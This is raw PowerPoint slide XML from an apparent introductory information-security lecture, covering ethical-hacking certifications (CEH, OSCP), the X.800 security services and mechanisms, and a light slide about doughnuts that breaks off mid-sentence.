            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>EC-COUNCIL CEH (EC Certified Ethical Hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54E7D4B2-692E-419B-8364-8260D735D555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="316565" y="1484784"/>
            <a:ext cx="8541209" cy="3378988"/>
            <a:chOff x="316565" y="1389699"/>
            <a:chExt cx="8541209" cy="3378988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D361998-4F50-4694-AB3B-811FC31044E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="316565" y="2276872"/>
              <a:ext cx="8503907" cy="2491815"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57538A16-AFB0-45A5-A0D7-57A6698C7B9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6152296" y="1389699"/>
              <a:ext cx="2705478" cy="695422"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD35E8B-C692-41F5-B19E-E2ABC0733C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="3287898"/>
            <a:ext cx="3153215" cy="3172267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1231D7C-EC97-431B-868B-3DCAEE228307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="429297" y="5092294"/>
            <a:ext cx="6511398" cy="1410353"/>
            <a:chOff x="429297" y="5092294"/>
            <a:chExt cx="6511398" cy="1410353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A8566D-BD64-4891-B83A-61FC6ACED51B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="486764" y="5445224"/>
              <a:ext cx="3391373" cy="1057423"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AADF334-2AF9-48CF-839E-D2F841D52EBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="429297" y="5092294"/>
              <a:ext cx="6511398" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0"/>
                <a:t>OSCP (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Offensive Security Certified Professional – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0" err="1">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Kali</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0" err="1">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>based</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:br>
                <a:rPr lang="it-IT" sz="1800" b="0" i="0" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="it-IT" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394884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10" presetClass="exit" presetSubtype="0" fill="hold"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en-US"/>
              <a:t>Security Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>enhance security of data processing systems and information transfers of an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>intended to counter security attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>using one or more security mechanisms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>often replicates functions normally associated with physical documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>which, for example, have signatures, dates; need protection from disclosure, tampering, or destruction; be notarized or witnessed; be recorded or licensed</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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152400"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Services (X.800)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>assurance that communicating entity is the one claimed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>have both peer-entity &amp; data origin authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>prevention of the unauthorized use of a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Data Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>protection of data from unauthorized disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Data Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>assurance that data received is as sent by an authorized entity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Non-Repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>protection against denial by one of the parties in a communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – resource accessible/usable</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU"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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>feature designed to detect, prevent, or recover from a security attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>no single mechanism that will support all services required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>however </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>one particular element underlies many of the security mechanisms in use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1"/>
              <a:t>cryptographic techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>hence our focus on this topic</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Mechanisms (X.800)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="3600"/>
              <a:t>specific security mechanisms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>encipherment, digital signatures, access controls, data integrity, authentication exchange, traffic padding, routing control, notarization</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="3600"/>
              <a:t>pervasive security mechanisms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>trusted functionality, security labels, event detection, security audit trails, security recovery</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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FOOD of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55299" name="Segnaposto contenuto 3" descr="Doughnut - Wikipedia, the free encyclopedia - Google Chrome"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="71896" t="34058" r="2979" b="16907"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1412875"/>
            <a:ext cx="4249738" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CasellaDiTesto 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540250" y="1692275"/>
            <a:ext cx="4424363" cy="1754188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> the «Ciambelle di Homer»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>From «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>» &amp; «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>donut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>salty</a:t>
